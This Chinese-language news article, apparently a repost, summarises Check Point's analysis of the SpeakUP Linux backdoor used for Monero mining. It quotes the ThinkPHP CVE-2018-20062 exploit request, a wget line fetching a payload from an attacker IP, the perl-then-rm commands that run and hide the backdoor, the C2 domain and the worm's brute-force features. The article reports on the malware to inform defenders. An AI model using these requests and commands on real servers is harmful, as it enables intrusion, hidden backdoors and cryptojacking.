日前，全球屈指一首的Internet安全解決方案供應(yīng)商Check Point IT安全部門研究人員發(fā)現(xiàn)了一個通過目前Linux服務(wù)器漏洞植入后門木馬的黑客活動，此次攻擊的目標(biāo)涵蓋了包括AWS主機在內(nèi)的世界范圍的全部服務(wù)器。攻擊范圍涵蓋了共6個不同Linux發(fā)行版和macOS系統(tǒng)服務(wù)器中的已知漏洞，目前黑客的主要攻擊目標(biāo)集中在東亞與拉美地區(qū)的Linux服務(wù)器。

創(chuàng)新互聯(lián)建站專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于成都網(wǎng)站設(shè)計、成都網(wǎng)站制作、惠民網(wǎng)絡(luò)推廣、微信平臺小程序開發(fā)、惠民網(wǎng)絡(luò)營銷、惠民企業(yè)策劃、惠民品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們大的嘉獎；創(chuàng)新互聯(lián)建站為所有大學(xué)生創(chuàng)業(yè)者提供惠民建站搭建服務(wù)，24小時服務(wù)熱線：18982081108，官方網(wǎng)址：www.chinadenli.net

　　全球SpeakUP“受害者”分部

　　這次的惡意攻擊的罪魁禍?zhǔn)妆幻麨镾peakUP，命名方式是以其中一臺命令與控制（C2）服務(wù)器名稱進行命名的。據(jù)悉Check Point的研究人員發(fā)現(xiàn)SpeakUP通過Linux服務(wù)器漏洞來植入后門木馬的攻擊方式可以繞過目前所有安全產(chǎn)品，這是由于該惡意軟件中存儲了大量此前出現(xiàn)過的攻擊案例，致使SpeakUP可以優(yōu)先識別目前存在的安全漏洞，并成功繞過幾乎所有的殺毒軟件的“雙眼”。
　　SpeakUP樣本采集
　　在Check Point的分析報告中顯示，首次發(fā)現(xiàn)的SpeakUP樣本是今年1月14日在我國的服務(wù)器上發(fā)現(xiàn)的，該樣本曾在1月9日被上傳至VirusTotal網(wǎng)站（專業(yè)的免費可疑文件分析服務(wù)網(wǎng)站）。但經(jīng)過嚴密的監(jiān)測后發(fā)現(xiàn)，沒有一家安全產(chǎn)品將SpeakUP惡意軟件標(biāo)為惡意。

　　這是因為為了逃避安全檢測，SpeakUp的代碼采用了base64加鹽算法加密。不僅如此，C2通信也是采用了相同的方式加密。這也是為什么VirusTotal上的殺毒引擎無法將其檢測為惡意的原因所在。
　　SpeakUP感染全過程：
　　植入腳本階段
　　根據(jù)Check Point報告中披露的數(shù)據(jù)來看，SpeakUP首先是利用ThinkPHP（輕量級PHP開發(fā)框架）的一個漏洞為攻擊起點，從中植入一個PHP shell腳本。
　　使用GET請求（如下所示），通過ThinkPHP遠程代碼執(zhí)行漏洞CVE-2018-20062將shell腳本發(fā)送到目標(biāo)服務(wù)器：
　　s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php
　　這個shell腳本接下來會通過query中的“module”參數(shù)來執(zhí)行命令。
　　植入后門階段
　　在腳本生效之后，SpeakUP將進行像服務(wù)器植入后門的操作
　　發(fā)送另一個HTTP請求（如下所示）到目標(biāo)服務(wù)器：
　　/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
　　實際上，這是一個注入過程，目的是植入ibus payload并將其存儲到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc
　　啟動后門并抹除痕跡階段
　　在植入后門成功后，SpeakUP將對服務(wù)器發(fā)送請求，啟動后門，在啟動后門后SpeakUP將通過刪除文件來清楚自己的感染痕跡。
　　使用如下HTTP請求來執(zhí)行后門：
　　/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc
　　SpeakUP感染后果：
　　在Linux服務(wù)器被感染后，SpeakUP使用POST和GET請求來與C2通信，C2是被黑的speakupomaha[.]com.。
　　第一個post請求會發(fā)送受害者ID和其他介紹性的信息，比如安裝的腳本的當(dāng)前版本等。
　　對應(yīng)的C2響應(yīng)是needrgr，表示受感染的受害者之前未在服務(wù)器上注冊，需要注冊。
　　之后，木馬會通過執(zhí)行以下的Linux命令來POST機器的全部信息：
　　· Uname (-r, -v, -m, -n,-a, -s)
　　· Whoami
　　· Ifconfig –a
　　· Arp –a
　　· cat /proc/cpuinfo | grep -c “cpu family” 2>&1
　　· who –b

　　一旦受感染服務(wù)器注冊完成，C2服務(wù)器就會發(fā)送新的任務(wù)——不同的C2服務(wù)器會命名受感染服務(wù)器來下載和執(zhí)行不同的文件。
　　有一個需要注意的點是，SpeakUP使用了User-Agent用戶代理。具體來說，SpeakUp定義了三個用戶代理，而受感染服務(wù)器在與C2服務(wù)器進行通信時必須使用這些代理。其中兩個代理是MacOS X User-Agent，第三個是經(jīng)過哈希處理的字符串：
　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
　　E9BC3BD76216AFA560BFB5ACAF5731A3

　　目前，SpeakUp主要服務(wù)于XMRig礦工，為其提供“肉雞（受感染服務(wù)器）”。根據(jù)XMRHunter網(wǎng)站的查詢結(jié)果顯示，攻擊者的錢包目前擁有約107枚門羅幣。
　　SpeakUP強大的自我傳播能力
　　攻擊者還為SpeakUp配備了一個“i”模塊，它實際上是一個python腳本，使得SpeakUP能夠掃描和感染位于受感染服務(wù)器所處內(nèi)網(wǎng)和外網(wǎng)的其他更多的Linux服務(wù)器。其主要功能有：
　　使用預(yù)定義的用戶名和密碼來暴力破解嘗試登陸管理面板；
　　掃描受感染服務(wù)器的網(wǎng)絡(luò)環(huán)境，檢測共享相同內(nèi)部和外部子網(wǎng)掩碼的服務(wù)器上的特定端口的可用性；
　　嘗試利用目標(biāo)服務(wù)器上的遠程代碼執(zhí)行漏洞

網(wǎng)頁標(biāo)題：帶你了解新型Linux服務(wù)器殺手——SpeakUP
鏈接分享：http://www.chinadenli.net/article36/cioopg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站內(nèi)鏈、靜態(tài)網(wǎng)站、響應(yīng)式網(wǎng)站、企業(yè)網(wǎng)站制作、小程序開發(fā)、網(wǎng)站排名

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)